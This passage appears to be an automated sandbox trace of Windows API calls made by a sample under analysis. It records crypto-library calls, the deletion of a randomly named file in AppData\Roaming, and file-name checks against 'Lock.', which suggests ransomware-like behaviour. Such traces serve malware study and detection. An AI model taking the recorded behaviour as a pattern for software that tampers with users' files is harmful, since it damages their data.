returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0227.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.990] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.990] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.994] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.994] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.994] FreeLibrary (hLibModule=0x756e0000) returned 1 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.994] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0227.994] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.995] CloseHandle (hObject=0x2a0) returned 1 [0227.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.998] CloseHandle (hObject=0x2d0) returned 1 [0228.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.005] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.005] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.005] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DS6Dq4b7eKkPU5JH.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3", lpFilePart=0x8cedf4*="DS6Dq4b7eKkPU5JH.mp3") returned 0x34 [0228.005] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ds6dq4b7ekkpu5jh.mp3")) returned 0x20 [0228.005] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf3ebe0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x1c2cf1e0, ftLastAccessTime.dwHighDateTime=0x1d5e4ec, ftLastWriteTime.dwLowDateTime=0x1c2cf1e0, ftLastWriteTime.dwHighDateTime=0x1d5e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x13541, dwReserved0=0x1, dwReserved1=0x1c, cFileName="DS6Dq4b7eKkPU5JH.mp3", cAlternateFileName="DS6DQ4~1.MP3")) returned 0xa87510 [0228.005] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ds6dq4b7ekkpu5jh.mp3")) returned 1 [0228.075] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf3ebe0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x1c2cf1e0, ftLastAccessTime.dwHighDateTime=0x1d5e4ec, ftLastWriteTime.dwLowDateTime=0x1c2cf1e0, ftLastWriteTime.dwHighDateTime=0x1d5e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x13541, dwReserved0=0x1, dwReserved1=0x1c, cFileName="DS6Dq4b7eKkPU5JH.mp3", cAlternateFileName="DS6DQ4~1.MP3")) returned 0 [0228.075] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0228.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0228.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0228.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0228.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0228.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0228.076] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0228.077] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DS6Dq4b7eKkPU5JH.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3", lpFilePart=0x8cf650*="DS6Dq4b7eKkPU5JH.mp3") returned 0x34 [0228.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0228.077] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DS6Dq4b7eKkPU5JH.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ds6dq4b7ekkpu5jh.mp3")) returned 0xffffffff [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0228.078] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0228.078] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.078] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0228.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0228.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0228.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0228.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0228.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E2eFopJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2eFopJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eFopJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FopJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pJKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kn6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ustHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tHoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HoKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kg.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0228.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0228.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0228.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0228.241] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0228.302] TranslateMessage (lpMsg=0x8cf968) returned 0 [0228.302] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0228.302] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0228.302] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0228.302] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0228.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0228.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0228.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2f045e8 [0228.303] RtlAllocateHeap (HeapHandle=0x970000, 